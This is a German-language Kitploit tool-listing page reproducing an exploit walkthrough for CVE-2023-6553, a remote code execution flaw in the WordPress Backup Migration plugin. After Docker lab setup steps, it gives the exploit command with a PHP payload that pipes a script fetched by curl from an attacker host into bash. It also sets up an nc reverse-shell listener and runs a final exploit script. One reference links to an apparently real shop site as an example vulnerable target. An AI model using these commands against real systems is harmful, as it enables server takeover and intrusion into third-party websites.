Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-6553 — Exploit-Entwicklung für CVE-2023-6553 im Backup-Plugin von WordPress | Kitploit
Tools/GitHubGitHub/harshit-mashru/cve-2023-6553
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubharshit-mashru/cve-2023-6553

CVE-2023-6553

Exploit-Entwicklung für CVE-2023-6553 im Backup-Plugin von WordPress

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-6553

Exploit-Entwicklung für CVE-2023-6553 im Backup-Plugin für Wordpress

Hierbei handelt es sich um eine kritische CVE mit einem CVSS-Score von 9.8

Die Schwachstelle ermöglicht es Angreifern, Befehle an den Server zu senden, der die verwundbare Version des Plugins ausführt.

Verwundbare Version Backup <= 1.3.7

Einrichtung

  1. Klone das Repository

  2. Führe den folgenden Befehl aus, um die Docker-Container einzurichten

root@kitploit:~
docker-compose up -d

Du solltest 2 Docker-Container sehen

  • Wordpress
  • SQL
  1. Nun kannst du zur Wordpress-Seite unter der IP des Docker-Containers navigieren; sie ist auch erreichbar unter
root@kitploit:~
http://localhost:8000/
  1. Um das verwundbare Backup-Plugin zu installieren, führe den folgenden Befehl aus
root@kitploit:~
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
  1. Melde dich nun über den Link aus Schritt 3 bei der Wordpress-Website an und installiere das Backup-Plugin, nachdem du es mit dem obigen Befehl heruntergeladen hast.

Ausnutzung

  1. Starte einen Listener auf Port 9000, um Callbacks zu empfangen, wenn wir den Exploit ausführen.
root@kitploit:~
python3 -m http.server
  1. Führe das Go-Skript mit dem folgenden Befehl aus
root@kitploit:~
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
  1. Du wirst den folgenden Fehler erhalten
root@kitploit:~
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>

Das liegt daran, dass nach den Filterkonvertierungen die Größe des Headers das vom Server erlaubte Limit überschreitet.

  1. Also zerlegen wir nun unseren Befehl in Teile, schreiben ihn in eine Datei auf dem entfernten Server und führen ihn dann aus. Aber zuvor müssen wir einen Listener starten, um eine Reverse Shell zu erhalten.
root@kitploit:~
nc -nlvp 8080

und führe nun den Befehl aus, um das verwundbare Plugin auszunutzen

root@kitploit:~
python3 final_exploit.py
  1. Du solltest zu diesem Zeitpunkt eine Reverse Shell haben.

Referenzen

  • https://patchstack.com/articles/test-wordpress-plugin-security/
  • https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
  • https://wordpress.org/plugins/backup-backup/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
  • https://plugins.trac.wordpress.org/browser/backup-backup/​
  • https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py ​
  • https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it ​
  • Wie einfach es ist, zu prüfen, ob eine verwundbare Version von Wordpress vorhanden ist: https://www.thetraveloutlier.com/shop/​
Tool herunterladen